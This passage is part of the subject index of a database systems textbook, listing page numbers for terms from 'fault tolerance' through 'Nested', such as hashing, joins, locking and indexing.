760-761, 776-777, 829-832, 834, 881, 883,
912, 914, 916

FAT, 516
fault tolerance, 630, 635, 881, 995
Faults, 881-882, 962
Features, 12, 26, 28, 35, 37, 48, 50, 81, 82-84, 97,

100, 102, 105-106, 115, 131, 139, 251,
310-311, 331-332, 348, 352, 373-376,
402-403, 406, 414, 416, 471, 482-484,
493-494, 497, 623, 628, 630-631, 775,
885-886, 909, 915-916, 929-930, 957-958,
963, 965-967, 981-982, 984, 989, 1011

Federated databases, 925
Feedback, 245, 283, 315-316, 329, 774, 926,

999-1004, 1018, 1031-1032
Fields, 61, 273, 297-299, 354, 358, 410, 420, 436,

1072

592, 600-604, 608, 610, 612, 621-622, 632,
634, 636-638, 641, 652-653, 665, 671-672,
674-675, 677-678, 692, 782-783, 801, 825,
838, 845, 1018, 1025

File, 4-5, 7-12, 15-22, 24-26, 27, 31, 34, 38, 41-44,
47-48, 56, 59-61, 85, 105, 244, 317, 330,
332-333, 344, 423-425, 428-431, 433-434,
437, 439-440, 456, 481, 491-493, 500,
588-635, 636-658, 660-661, 665, 667-668,
670-671, 673-679, 681-683, 688-695,
698-706, 709, 716-723, 725-726, 729,
734-738, 740-741, 757-758, 798-801, 804,
816, 825-826, 855, 955, 997

sequential, 592, 597, 607-611, 634, 636, 649-650,
668, 676, 679, 681-682, 757, 955, 997

file access, 10-11, 44, 633
File pointer, 604
File server, 43
File sharing, 627
file size, 725
File structures, 48, 105, 588-635, 679, 686
File system, 20, 47, 330, 430, 602
Filename, 456
files, 1, 3-5, 7-9, 11, 15-17, 19-20, 24, 29-30, 34, 38,

40-41, 43, 48, 56, 75-76, 204, 314, 332-334,
336, 350, 428, 437, 514, 523, 592, 597-602,
606, 608, 610-611, 614-615, 619, 621-622,
628-631, 633, 635, 636-680, 682-683,
684-685, 694-695, 698-702, 705-706, 709,
716-717, 720-722, 734-735, 799, 838,
902-903, 915, 921-922, 995-997

access method, 606, 630, 633, 636, 638, 650, 674
directories, 631, 921-922
disk storage, 588, 592, 597-602, 604, 606, 608,

610-611, 614-615, 619, 621-622,
628-631, 633, 635, 648, 716

field, 592, 599-602, 604, 608, 610-611, 614-615,
621-622, 629-630, 633, 636-660, 666,
668-669, 671, 673-678, 691, 716, 902

HTML, 24, 437, 491, 500
indexed sequential, 636, 649-650, 676
kinds of, 838, 995
management systems, 885
missing, 75
organization and access, 606
records, 3-5, 11, 16-17, 19, 29-30, 34, 56, 332-333,

588, 592, 597, 599-602, 604, 608,
610-611, 614-615, 619, 621-622,
629-630, 633, 635, 636-638, 640-643,
645-649, 652-658, 662, 665-668,
670-671, 673-675, 682-683, 694-695,
698-702, 716-717, 720-722, 734-735,
799, 801, 838, 902-903, 996-997

streams, 1, 600
Filtering, 524, 849-851, 859, 872-873, 1023, 1027
Filters, 690
Find Next, 605
Firewall, 842
firmware, 43
first method, 164, 235
First normal form, 61, 524, 526-528, 538, 544, 583
First-order predicate logic, 55
flag, 298-299, 587
Flash drives, 590
Flash memory, 590, 635
Flex, 892
float type, 406
Floating point numbers, 362, 382
Floating-point, 57, 87
Flow control, 836, 838-839, 861-863, 871, 873-874
FLWR expression, 439
folders, 995
, 424
Font, 423-424
fonts, 424
for attribute, 63, 84, 851
Foreign key, 69-70, 72, 74, 76, 85-86, 90-91, 105, 107,

109, 145-146, 160, 190, 289-295, 297, 300,
347-348, 435, 511, 514, 519-520, 570, 578,
721, 742, 895, 1042

Foreign key constraints, 107, 435
Form, 3, 19, 23-25, 28, 30, 36-39, 47-48, 51, 61, 63,

65, 75, 92-93, 120, 122, 130, 134, 150-151,
161, 170, 177-180, 182, 184, 186, 229, 269,
271, 273, 277, 295-296, 321, 337-338, 342,
344, 346, 348, 350-351, 362-363, 374, 378,
386, 401, 409, 420, 481-483, 490-494,
497-498, 502-503, 508-510, 524-528,
532-533, 535-538, 540-549, 551-552,

556-558, 577-578, 581-584, 599, 628,
693-694, 730, 737-738, 766-767, 892-893,
955, 961, 963-964, 969-972, 977-978,
981-984, 989, 996, 1024-1025

design a, 277, 545
Designer, 28, 229, 342, 350-351, 369, 392, 508,

542, 549, 552, 582, 737
form fields, 420
Formal language, 149, 245
Formal languages, 55, 83, 188, 996
formats, 20, 29, 273, 601, 629, 893, 993, 1017
formatting, 420, 424-425, 495, 594, 601, 993, 1037,

1044
paragraphs, 993

Forms, 3, 18, 24, 27, 36-37, 71, 155, 249, 268, 318,
329, 482, 495, 502, 509-510, 523-526, 532,
538-539, 543-544, 550-552, 558-559,
578-579, 581, 583, 586, 694, 737-738, 892,
977, 1006, 1013

Forwarding, 46
frames, 930, 964
Frameworks, 875
Frequency, 330, 334, 734, 966, 997, 1002-1003, 1005,

1008, 1012, 1025
Function, 10, 13, 17, 35, 37-38, 42, 119-120, 122,

124-126, 128-129, 140, 169-171, 176,
189-190, 212, 230, 371-372, 377-379, 406,
456, 458, 466-467, 470-485, 495, 497-500,
502-504, 551, 581, 611-617, 619-621,
633-634, 666, 668, 671-672, 675-676,
699-701, 703-704, 706, 716-718, 721-722,
729, 837-838, 866-867, 870, 918, 955, 964,
981, 1002, 1010, 1060-1063

computation of, 772
description, 10, 35, 230, 472-473, 695, 1010

Function calls, 456, 458, 466, 471-477, 484-485
function definition, 379
Functional dependency, 70, 509-510, 513, 520-522,

525, 530, 532, 535-538, 541, 543-544, 551,
553-555, 557, 559-560, 562, 565-568, 573,
575, 580-581, 583-584, 737

Functions:, 40, 470, 479, 497
in, 3-4, 13, 24-25, 27, 35, 37, 40-42, 45, 51-52,

102, 105, 119-120, 124-126, 134,
136-137, 139, 141, 149, 168-170, 177,
189, 195, 197, 243, 281, 311, 314, 342,
353-354, 360, 369-370, 372, 407, 414,
424, 455-456, 470-471, 473-474, 476,
479-482, 484-485, 497, 499-500, 581,
613-614, 620-621, 633, 716-722,
728-730, 857-861, 883, 893, 916, 921,
1048-1049, 1062-1064

point of view, 130

G
games, 3, 239
Gap, 344, 595, 630-632, 1055-1056
Garbage collection, 674, 824
Gate, 420
Gateway, 916-917
general issues, 570, 673, 676

OR, 570, 673, 676
General Motors, 924
generalization and specialization, 251, 269
Generator, 362, 388, 684-685
Generic types, 58
Genetic algorithms, 1046
Geometric objects, 372, 399
GIF, 964, 1024
Gigabit Ethernet, 629
Global variable, 499
global variables, 497, 499, 505
Glue, 981, 989
Google, 37, 914-915, 995, 1017, 1020, 1029, 1031
Google App Engine, 915
Grammar, 684
Granularity, 624-625, 750, 780, 798-801, 805-806,

853, 943-946, 949, 953-955
Graph, 182-183, 421-422, 436-437, 441, 446, 684,

705-708, 767-769, 771, 789-791, 807, 915,
957, 961, 980-981, 987

Graphics, 14, 357, 496, 498, 892, 1021, 1065
Gray, 635, 779, 807-808, 835, 964-965
> (greater than), 495
Grouping, 76, 105, 115, 124, 126-130, 137, 139-141,

143, 169-170, 177, 189, 195, 208, 409-410,
414, 514, 626, 667, 703-704, 714, 895, 943,
964, 966, 1039, 1062-1064

guidelines, 226, 264-265, 330, 332, 353, 428, 510,

520, 543-544, 733, 744-746, 854
guides, 653
GUIs (Graphical User Interfaces), 27

H

, 424

, 424
Hacking, 857
Handle, 21, 45, 48, 296, 298-299, 436, 472-475,

633-634, 667, 740, 748, 824, 829, 851,
1029, 1047

Handles, 27, 40, 46, 50, 458, 862, 892-893, 908, 916,
919

handling, 14-15, 41, 45, 403, 461, 467, 616, 674, 799,
803, 831, 841, 914, 956, 968, 1027, 1037

Hard disks, 593, 596
Hardware, 4, 13, 15, 18, 24, 34, 42-44, 47, 283, 313,

331, 334, 336, 593, 595-596, 627-629, 749,
837, 887, 909

Harmonic mean, 1016
Hash file, 611, 613, 619, 631, 633-635, 668, 702, 782
Hash functions, 614, 633, 635
Hash join, 695, 699, 701
Hash key, 592, 611, 615, 620-621, 630, 633, 691-692,

694, 718, 722
Hash table, 362, 611, 614, 695, 699-702
Hashing, 332, 588-635, 636, 640-641, 666-668, 673,

675-676, 679, 682-683, 695, 699-700, 702,
704, 716-718, 722, 730, 736-737

hash index, 668, 675, 736
hash table, 611, 614, 695, 699-700, 702
search key, 666, 668, 675, 736
typical, 592, 594-597, 602, 624, 629-630

, 423-424
Head, 423-424, 593, 596-597, 628, 630, 755, 969-970,

974, 976, 978, 980-981, 1054-1055
headers, 122, 603, 738
Heap sort, 688
Height, 208, 277, 370, 398, 963
height attribute, 208
Help, 25, 31, 37, 40, 42, 47, 56-57, 264, 318-319,

336-337, 354, 607, 631, 637, 744, 870, 909,
938, 957, 1017, 1028

Heuristic, 350, 686, 705-706, 708-709, 713-715, 724,
728, 1011

Hexadecimal notation, 88
hiding, 365, 879
Hierarchical model, 36, 50, 427
Hierarchy, 36, 50, 207, 255-259, 269-270, 275, 283,

298, 370, 372-373, 379, 389, 414, 444,
446-447, 589-591, 799, 801, 852-853, 876,
995, 1010, 1023, 1028, 1039, 1041

hierarchy of, 36, 207, 389, 589, 853, 1028
High-level languages, 311
HiPAC, 987
Histogram, 693, 718-720, 965
Hits, 284, 1014-1015, 1019-1020, 1029, 1031, 1033
Honda, 582
Host language, 36, 39-40, 51, 379, 454, 456-457, 459,

462, 471, 484-485
hotspots, 961
, 423-424
HTML, 22, 24, 420, 423-427, 437, 447-448, 490-494,

497-500, 502-503, 858, 892-893, 957, 993,
1021, 1024, 1027

HTML (Hypertext Markup Language), 420
HTML tags, 424, 493
Hubs, 627, 879, 1019-1020
Hue, 965
Hyperlinks, 22, 878, 998, 1018-1019, 1025
hypertext, 22, 420, 424, 491, 858, 1024
Hypertext Markup Language, 22, 420, 424
Hypertext Transfer Protocol (HTTP), 858

I
IBM, 33, 41, 47, 55, 83, 106, 109, 186, 188, 343,

351-352, 635, 649, 716, 745, 885, 988
Icons, 338
id attribute, 300
Identification, 205, 269-270, 274, 276-277, 325, 581,

868, 963, 965, 967, 1047
Identifiers, 106, 377, 382, 412, 425, 430, 674, 918,

961, 969
Identity management, 853, 876
IDREF, 429
IEEE, 416, 1017
Image tags, 967
images, 1, 23-24, 88, 424, 598, 600, 830, 930, 956,

1073

958, 963-967, 982, 984, 988, 1029
quality, 967, 998

images and, 598, 958, 964, 966
Impedance mismatch, 17, 457, 484-485
Implementation, 7, 10, 29, 32, 50, 87-88, 107, 109,

130, 135, 143, 201, 203-204, 298, 313-319,
328, 331-335, 347, 350, 353, 360-361,
365-366, 371, 378, 392, 400, 406, 416, 461,
476, 702, 729, 779, 846, 873, 875, 885, 989,
1047

implements, 7, 81, 103, 456, 877, 960
IMPLIED, 123, 130, 541-542, 777
import, 466, 476-478
importing, 466
IN, 1-5, 7-26, 27-38, 40-42, 44-53, 55-67, 69-81,

82-85, 87-109, 113, 128-143, 148-158,
160-198, 201-245, 246-262, 264-285,
287-304, 309-356, 377-417, 433-442,
444-448, 454-485, 488, 490-497, 499-506,
508-533, 535-549, 564-570, 572-579,
581-586, 588-617, 619-635, 636-642,
644-649, 651-663, 665-679, 711-730,
733-746, 747-752, 754-779, 807-808,
836-876, 889-898, 900-927, 929-989,
992-1033, 1039-1049, 1050, 1052,
1054-1056

incremental backup, 41
Index scan, 690
Indexed allocation, 603
Indexing, 22-23, 35, 289, 332, 348, 436, 589, 606,

617, 636-680, 682-683, 691, 717-719, 733,
736-737, 929-930, 959-960, 964-965, 967,
982, 988, 992-995, 997-1000, 1006,
1008-1012, 1027, 1031-1032, 1041-1042

Indices, 561
Indirection, 637, 645-646, 655, 657-658, 673, 676-678
Inference, 268, 551-555, 557, 566, 574-575, 579,

582-583, 586, 838-839, 871, 968, 973, 975,
977, 979-982, 984

Inference rule, 554, 557
infinite, 971, 974, 977-978, 1020
Infinite loop, 977
Infix notation, 970-971
Information:, 312
Information extraction, 1000, 1011, 1031
Information hiding, 365
Information retrieval, 24-26, 992-1033
Information security, 842, 872
Information system (IS), 313
Information technology (IT), 7, 310
INGRES, 106, 143, 198, 741, 926
inheritance, 22, 246-247, 249, 252, 256-258, 261, 266,

274, 299, 350, 359-361, 368-374, 376,
379-380, 387, 389, 394-395, 398-400,
402-403, 409, 412-415

class hierarchies, 359-360
specialized, 22, 257
subclasses, 247, 249, 252, 257-258, 266, 274, 299

inheritance using, 395
Initialization, 594, 630
Injection attacks, 857-859, 874-875
Inner join, 123-124, 164, 172, 190, 705
INPUT, 37, 39-40, 166, 318, 328, 333, 350, 413, 461,

465, 481, 492-494, 498, 503-504, 551, 555,
557-558, 565-567, 671, 700, 705-706,
715-716, 720-721, 724, 749, 857-859, 865,
892-893, 1042-1043

tag, 500
input validation, 859
Insert, 28, 31, 36, 50, 65, 72-74, 76-77, 102-104, 106,

109, 132, 140, 365, 384-385, 387-388,
500-501, 503, 514, 576, 605-606, 610, 655,
661-663, 673, 680, 702, 734-736, 801, 838,
851, 905, 916-917, 933-935, 937-941,
949-950, 983

inserting, 74, 132-133, 255, 365, 501-502, 505, 610,
646, 660, 662, 735, 775, 932, 935

files, 610, 646, 651, 653-654, 660, 662, 735
Insertion, 35, 72-73, 79, 83, 132, 255, 514, 520, 524,

543-544, 604-605, 610, 614, 616, 619, 621,
629, 633-635, 640-641, 649, 651, 654, 656,
659-660, 662-663, 665, 674-675, 679-680,
735, 802-803, 1065

installation, 48, 85
Instance, 31, 49, 58, 62, 66, 77-78, 114, 214-215, 217,

219-220, 230-234, 236, 238, 243, 264, 269,
271, 292-293, 336, 363, 365, 369, 378-379,
386, 422, 430, 440, 448, 521, 715, 723, 967,
1007, 1043

Instance method, 375-376, 378
Instance variable, 360, 363
Instances, 27-28, 30-31, 49, 59, 214-216, 218-219,

227, 229-230, 232-234, 238, 243, 268-270,
293-294, 411, 439, 523, 552, 627, 742, 745,
962, 967

instruction set, 671
Integers, 64, 362-363, 382, 612, 977

unsigned, 382
zero and, 496

Integration, 321-323, 325-327, 350, 352-353, 355-356,
413, 877-878, 925, 1000, 1018, 1021-1022,
1035

Integrity constraints, 18-19, 26, 56, 64, 66, 69-72, 74,
76-77, 79, 85, 89-90, 92, 103-105, 110, 191,
197, 200, 289, 355, 441, 452, 570, 581, 759,
885, 985

domain constraints, 64, 72, 76, 581
enforcing, 18, 76, 581
foreign key constraints, 107

intellectual property, 868, 873, 876
intensity, 965, 967
Interaction, 1-2, 27, 38, 45, 316, 336-338, 457-458,

493, 892-893, 993, 998, 1028-1030
Interaction diagrams, 337
Interconnect, 998
Interface inheritance, 371, 387, 394, 398-399, 413-414
Interfaces, 14-15, 18, 21, 24, 27, 34, 36-38, 40, 43,

46-47, 51-52, 106, 149, 314, 336, 350, 369,
372, 383-384, 386-387, 389, 392-394, 399,
413-414, 416, 465, 482, 500, 596, 995,
1017, 1022

Comparable, 1022
Iterator, 384, 387, 389, 413-414
List, 34, 369, 372, 386, 389, 393, 413-414, 416,

482
operating system, 14, 38, 43, 46, 329

Interference, 11, 758-760, 797-798
Interleaving, 625, 749, 752, 763-765, 769, 776,

782-783
Internal Revenue Service, 3
Internet, 1, 42, 425, 447, 458, 490-491, 499, 626, 628,

853, 855, 868, 878, 914, 919-922, 1026
IP address, 499
mobile, 868

Internet and, 868
Internet Applications, 420, 425, 922
Interpreter, 195-197, 476, 491, 493-494, 499
interpreters, 490
Interrecord gaps, 597
Interrupt, 754
Intersection, 99, 149, 155-158, 164, 167, 176-177,

189-190, 260, 388, 666, 687, 692, 696-697,
702-703, 718-719, 729, 950, 953, 979, 1046

interviewing, 233
Into clause, 461-462, 468-469
Intranet, 995
Intranets, 628, 868
Introduction, 2, 26, 132, 150, 177-178, 269, 273, 355,

369, 440, 454-489, 505-506, 747-779,
836-837, 860-861, 872, 892, 919, 929, 955,
968, 981-982, 992-1033

history, 759-760, 776-777, 982, 993, 997,
1029-1030

Inverted index, 999-1001, 1006-1007, 1011-1013,
1031

I/O (input/output), 595, 716
IP (Internet protocol) address, 499
Isolation, 12, 524, 627, 747, 758-759, 765, 774-778,

882
Item, 1, 5, 8-10, 16, 19, 30-31, 33, 78-79, 242, 283,

546, 581, 600, 734, 744, 750-754, 757, 760,
762-768, 770, 772-773, 777, 780-799, 801,
803-805, 809, 812-823, 830-835, 893, 905,
910-912, 962, 1026

Iterate, 387, 474
Iteration, 338, 700, 1000
Iterator, 93, 384, 387-389, 403-405, 409-411, 413-414,

457, 462, 468-470, 479, 484, 504
Iterator interface, 388
iterators, 384, 468-470, 485

cursor, 468, 485
interface Iterator, 384

J
Jackson, Michael, 963
Java, 17, 40, 45, 83, 105, 352, 394, 402, 454-455,

457-459, 466-471, 476-480, 484-486, 500,
892

Class Library, 484
keywords, 459, 468

Java code, 467
Java database programming, 471

JDBC, 471
JavaScript, 424, 454, 491, 505

strings in, 505
JDBC, 45, 56, 105, 466, 471, 476-480, 482, 484-486,

500, 892-893
drivers, 45, 466, 476
loading, 476

Job, 12-13, 138, 205, 233, 249, 253, 265, 271-272,
297-298, 501, 503-504, 600-601, 604, 606,
609, 612, 632, 677-678, 681, 734, 738,
850-851, 942

Join:, 162, 164
Join operation, 123, 160-164, 172-173, 181, 189, 194,

292, 294, 440, 514, 518, 532, 572, 698-701,
704-705, 711-712, 714-715, 720-724, 727,
729-730, 736, 896, 961

Join ordering, 723-724
Join selectivity, 163, 698, 720-722

K
Kernel, 909
Key access, 668, 675
Key distribution, 865
Key field, 608-611, 629, 633, 637-640, 642, 644-645,

649-650, 654-657, 659-660, 666, 676-678,
691-692, 718

keyboard, 282, 628
Keys, 37-38, 69, 73, 76-77, 79-80, 85, 87, 90-91, 107,

131, 205, 209, 216, 234-235, 241, 289-295,
299-301, 346, 350, 354, 377, 392, 400-401,
413-414, 427, 430, 496-497, 523-526, 530,
535, 543-544, 546, 550, 552, 573, 586, 619,
621, 637-638, 665-668, 674-676, 734,
864-866, 896-898, 1060-1061

candidate, 65-66, 76-77, 524, 526, 530, 532-533,
535, 543, 546, 548, 552, 558, 573

Sense, 241
keystrokes, 37-38

L
Languages, 14, 17-18, 21-22, 27, 34-38, 49, 51, 62,

66, 70, 83, 105, 119, 150, 177, 188, 198,
211, 245, 249, 258, 265, 273, 277, 329,
358-360, 362-363, 365, 371, 374, 382, 394,
402, 411, 416, 420-421, 424-425, 457-459,
484, 499-500, 886, 955, 971, 1024

Laptops, 897, 995
late binding, 361
Latency, 591, 595-596, 634
layers, 46, 892, 957

shape, 957
Layout, 338
layouts, 351
Leading, 22, 34, 45, 106, 164, 246, 258, 359, 362,

368, 412, 446, 496, 509, 617, 760-763, 767,
788, 803, 855, 904, 938, 989

Leaf, 166-167, 257-258, 266, 422, 427, 429, 436-437,
619-620, 651-652, 657-662, 664-665, 671,
673, 675-676, 678-679, 683, 703, 706-707,
713-714, 725-726, 745, 960

legacy systems, 622, 685
Lexicographic order, 1013
Libraries, 336, 466, 476-477, 484, 491, 500, 505, 627,

929, 993-994, 997, 1017, 1029-1030, 1032
licensing, 51

open source, 51
life cycles, 353
LIKE, 25, 33, 37, 47-48, 52, 55, 100, 142, 218, 229,

280, 303, 311, 328, 350-351, 428, 465, 546,
551, 629, 678, 688, 742, 745, 762, 773, 793,
866, 884, 914, 916, 958, 960, 987, 1006,
1019-1020, 1024, 1047-1048, 1058-1059

Line:, 461, 476
line comments, 492
Line numbers, 459, 491
Linear hashing, 617, 619-621, 630, 633-635, 673, 718,

722
Linking, 49, 332, 1019, 1022
links, 229, 319, 825, 883, 910, 917-919, 996, 1011,

1019-1020, 1023, 1027
IDs, 996, 1011

Linux, 491, 626
LISP, 372
List, 3, 7, 12, 25, 34, 49, 58, 60, 63, 72, 75, 95, 97,

1074

101-102, 107, 129, 134, 152-153, 158,
162-163, 167-170, 175-176, 181-183,
185-195, 236, 239, 254-255, 262, 275-277,
284-285, 354, 358, 369, 372-374, 377-378,
385-386, 388-389, 393, 401-402, 405-407,
409-411, 413-414, 416, 422-424, 429, 448,
485, 547-548, 614-615, 640, 665, 701-702,
815-816, 819-820, 822-824, 873, 924, 926,
951-952, 956, 961, 986-987, 999-1000,
1060-1061

Lists, 36, 84, 102, 129, 163, 166, 276, 351, 388, 409,
495, 549, 585, 615, 637, 688, 822, 831,
895-896, 905-906, 922, 1017, 1061

Literal, 87-88, 93, 100, 381-382, 386-387, 411, 495,
971-973, 982

Literal value, 362-363, 386
Load balancing, 623-624, 1045
Load factor, 621, 630, 635
Loading, 40-41, 103, 314, 333, 476, 592, 1026, 1036,

1043-1044
Local Area Network (LAN), 628
local data, 916
Local server, 493
Local variable, 482
localization, 882, 901
locations, 23, 42, 66-68, 71, 86, 90-91, 110-111,

143-146, 162-163, 199-200, 205-206,
212-213, 227, 229, 288-290, 293, 301, 305,
364, 366, 390-391, 419, 449-452, 486,
511-513, 526-528, 587, 607, 613-615,
617-618, 676, 731-732, 898, 927-928,
960-961, 990, 1059

Lock table, 782-783, 785, 788, 799
locked state, 785
Locking, 386, 740, 772, 780-787, 789, 791-792,

794-801, 803-808, 822, 863, 909-911, 925
Locking protocol, 772, 785-787, 800, 805-807, 822,

911
Locks, 740, 781-786, 788, 790-792, 795-796, 799-801,

803-807, 819, 908-912
Log record, 757, 814, 825-828, 833
Logic programming, 968, 975, 989
Logical operators, 179
login credentials, 856
Lookup, 291, 385, 389, 394, 726, 1012
Lookup table, 291, 1012
Loop, 315, 457, 460-463, 470, 475, 480, 483, 497,

503-504, 555, 562, 567, 694-695, 698-700,
704, 715, 721-723, 726, 977

loops, 316, 329, 456, 458, 462, 480, 483, 495, 694,
715

prompt, 462
Lossless join, 525, 561-563, 566, 574, 584, 586
Lost update problem, 752-753, 762, 765
low-level, 28-29, 36, 40, 50, 812, 965

M
machine, 42-44, 277, 339-340, 458, 480, 909, 915,

994, 1025
Magnetic disks, 29, 588-593, 629
Magnetic tape, 588, 592, 597, 829
Mail servers, 43
main function, 981
Main memory, 17, 40, 589-592, 595, 597-598,

603-605, 611, 644, 688-690, 695, 698-699,
701, 716-717, 719, 721, 723, 750, 757-758,
811-812, 814-815, 821-824, 835, 881, 1054,
1056

maintainability, 1045
Mandatory access control (MAC), 848, 872
Manufacturing, 1, 22, 24
Many-many relationship, 197
Many-to-many relationship, 566
Map, 34, 280, 287, 291-293, 301-302, 317, 362, 394,

401-402, 413, 415, 457, 523, 543, 667, 672,
943, 956-958, 962, 1018

mapping, 23, 32-35, 38, 56, 60, 62, 92, 203-204,
287-308, 315-317, 332, 347-348, 350-353,
394, 399-402, 415, 436, 447, 508-510, 543,
550, 896, 901, 914-915, 926, 1023

value, 60, 62, 211, 291, 294-295, 297-298, 300,
351, 400, 543, 914, 1023

Maps, 1, 23, 25, 277, 613-614, 852, 955-956, 963, 998
margin, 903
markers, 338, 610, 629, 640
Marketing, 24, 28, 1026
Markov model, 1020
Markup language, 22, 47, 420-448, 450-453
markup languages, 424, 1021

Mass storage, 41, 590
Master file, 610, 629
Materialization, 135, 724, 729
Materialized view, 136, 516
math, 5-6, 54, 112, 147, 487
Matrices, 1012, 1037
Matrix, 561-563, 584, 626, 801, 807, 844, 965, 999,

1037-1038
singular, 965
translation, 965

Maximum, 70, 87-88, 125, 169, 171, 218-219, 229,
235, 243, 283, 312, 363, 377, 409, 434, 601,
615, 619, 621, 792, 871-872, 955

Maximum value, 125, 792
Mean, 2, 57, 62, 125, 198, 226, 362, 371, 389, 414,

554-555, 624, 713, 767, 832, 944, 962, 970,
1016

measurement, 57, 350, 956, 1029
Media, 1, 28, 313, 598, 754, 834, 967, 982, 997, 1028

guided, 1028
Median, 485, 1025
Megabyte, 595
Member, 49, 158, 179, 209, 214, 247-249, 257-258,

260, 262, 264, 269, 283, 298, 397, 408-409,
411, 526-527

Memory, 17-18, 40, 43, 60, 282, 329, 411, 589-592,
595, 597-598, 602-605, 607, 611, 623, 625,
629, 635, 644, 688-690, 694-695, 698-702,
716-723, 727, 750, 811-812, 821-824, 835,
862-863, 879, 881, 959, 1054

allocation, 603, 607
features, 623
flash, 590, 635
operations of, 411, 690, 754, 757, 811-812,

821-822
secondary, 589-592, 597, 607, 623, 629, 635, 644,

695, 698, 716-717, 719-722, 727, 881,
887, 959

memory cards, 590
Memory hierarchy, 590-591
Memory management, 411
Menus, 36-37, 201, 331, 495, 1065
Merge algorithm, 688-689, 729
Messages, 19, 337-338, 424, 502, 818, 865, 887, 912,

930, 963-964, 982, 993-994
reliability, 881
response, 912, 993

Metadata, 728, 877, 883, 885, 891, 913-914, 919, 925,
967, 988, 996-997, 1000-1001, 1011, 1024,
1028, 1036, 1044-1045

3D objects, 988
Metal, 1028
Method, 10, 57, 164, 189, 227, 235, 249, 265, 285,

360-361, 365-367, 369-373, 375-378, 402,
406, 414, 420, 455, 494, 496, 498, 567, 606,
610-611, 613-614, 624, 629-630, 650, 664,
667, 674, 682, 691-695, 698-699, 718-724,
726, 728, 791, 804, 806-808, 818-821, 823,
831, 843, 848, 909-912, 925, 997, 1025

Add, 10, 265, 367, 629, 674, 728, 804
Exists, 371-372, 496, 498, 567, 636, 692-694,

721-722, 791, 848
methods, 48, 130, 137, 164, 235, 285, 319, 321, 329,

334, 342, 345, 358, 360, 372-374, 378-379,
401-402, 406, 412-413, 415, 454, 606, 673,
690-694, 714, 719, 722, 724, 729, 758, 771,
776, 797, 807-808, 818, 830-831, 863, 908,
910-912, 976, 997, 1005, 1023-1025, 1043

class name, 401
definitions, 360, 373, 776, 863
driver, 466, 476
fill, 673
get, 342, 693, 722, 767, 818
responsibility, 912
turn, 374, 466, 476, 588
valued, 401

Metrics, 992, 1014-1015, 1029
Microprocessors, 622-623
Microsoft Access, 2, 48, 1058
Microsoft SQL Server, 501, 915
Millisecond, 383-384
Minimum, 88, 125, 169, 188, 194, 219-220, 235, 283,

350, 434, 509, 626, 662, 700, 735, 797, 854,
861, 872, 890, 960, 1058

Mod, 607, 611-614, 619, 621, 625, 633, 701, 866
Mode, 481, 684-685, 783, 795, 799-803, 805, 838,

869, 887
Model Tree, 427
Modeling, 15, 22-23, 29, 56, 75, 201-245, 246-247,

249, 259, 261, 268, 272-275, 283-285, 303,
320, 322-323, 328-329, 332, 334-335, 340,
343-345, 348, 351-352, 355-356, 381, 481,
885, 965, 967, 988, 999-1000, 1026, 1050

theory, 56, 273, 988
Models, 11, 22-23, 27-30, 33, 47-51, 53, 56, 61-62,

106, 216, 236, 246-247, 258, 268-269, 271,
273, 285, 287, 295, 304, 320, 334-336,
352-353, 355-356, 360, 362, 367-368, 373,
416-417, 424, 441, 621, 746, 808, 867,
885-886, 915, 924, 929-989, 991,
1005-1008, 1022, 1029-1030, 1032,
1050-1052

activity, 11, 28, 335, 348, 961, 1029
behavioral, 335-336, 352
interaction, 27, 336, 1029-1030
semantic data, 246-247, 268-269, 271, 285, 356
structural, 202, 236, 271, 285, 287, 335-336, 352,

1005
use case, 335-336, 352

Modem, 283
Modes, 318, 795-796, 801, 993, 998, 1029-1030
Modular design, 1044, 1048
Module, 17-18, 23, 27, 38, 40, 436, 500, 686, 759,

783, 897, 905
Modules, 11, 14, 23, 27-28, 38-40, 45-46, 51, 83, 105,

458, 480-482, 893, 907, 920-921, 994
MOLAP, 1046, 1048
Monitor, 3, 35, 43, 132, 282, 455, 465, 628, 739,

803-804, 940-941, 1058
Monitors, 41, 331
Mouse, 37, 282, 628
move, 281, 311, 330, 399, 438, 464, 615-616, 627,

640, 661-662, 713-714, 767, 842, 908
Movie database, 244
movies, 23, 242-244, 930, 963, 982
MP3, 590
MTBF (mean time between failures), 624
Multimedia, 1, 22, 83, 627, 929-930, 963, 965-967,

981-983, 987-988, 993-994, 996
image, 963, 965-967, 988

Multiple, 4, 8, 11, 14-16, 18, 25, 31, 42-43, 45-47, 88,
97, 103, 105, 124, 135-137, 164, 173, 209,
233, 239, 241, 243-244, 256-258, 269-270,
281, 289, 295-297, 299, 311-312, 338, 351,
371-373, 387, 394, 405, 414, 438-439, 442,
446-447, 461-463, 465, 468, 479-480, 495,
509, 528-529, 547-548, 588, 614, 625-628,
636-637, 665-666, 674-676, 691-692,
718-719, 723, 741-745, 747-749, 794-795,
797-801, 806-808, 828, 849-850, 878-880,
882-883, 886-887, 890, 897, 909-910, 926,
960, 970, 989, 1022-1023, 1026-1029,
1042-1043

declarations, 8
Multiple inheritance, 252, 256-258, 299, 372-373, 387,

394, 399, 414
Multiplication, 101
Multiplicity, 228-229, 275, 356, 434
Multiprogramming, 748, 863
multiuser, 8, 11, 15, 20, 47, 748-749, 776, 819-820,

822-824, 830-831, 838, 1037
Multivalued dependency, 510, 538, 540-541, 544, 551,

575, 578, 584
Mutator, 378
Mutual exclusion, 781, 852, 872-873, 876
MySQL, 48, 55, 106, 311, 491, 500-501, 746

N
name attribute, 65-66, 80, 211, 213, 223, 229, 434,

493
named, 85, 91, 109, 138-139, 176, 192-194, 367-368,

371, 378, 380, 394, 403-404, 406-408, 412,
414, 468-470, 708, 750-751, 798, 866, 936,
941, 1011

names, 2-3, 7-8, 10, 20, 30, 38, 56-59, 62-63, 65, 67,
91-93, 95-97, 99, 103, 107-108, 117-123,
134-135, 141-142, 154-158, 162, 170, 173,
175-176, 178, 183, 185, 188, 190-192,
195-197, 202, 214-215, 217, 223-224,
227-230, 239, 244, 270, 356, 360-361,
381-382, 391, 403-406, 408, 412, 425-429,
437-438, 440, 447, 459-460, 468-470, 483,
499-500, 595, 684, 905-906, 922, 968-969,
971-972, 979, 1006-1007, 1058-1060, 1063

Namespace, 434
namespaces, 433
Naming conventions, 223, 236, 354
NASA, 591

1075

National Library of Medicine, 1009-1010
Natural join, 123-124, 162-164, 167, 172, 175, 177,

189, 194, 294, 514-515, 518-519, 542, 546,
559-561, 570-572, 694, 738

Natural language processing, 1018
navigation, 50, 653, 892, 1017, 1020, 1023, 1025,

1027-1028
Negation, 183, 185, 471, 670, 975, 1063-1064
Neighborhood, 963
Nested, 49, 61, 102, 105-106, 115, 117-122, 126,

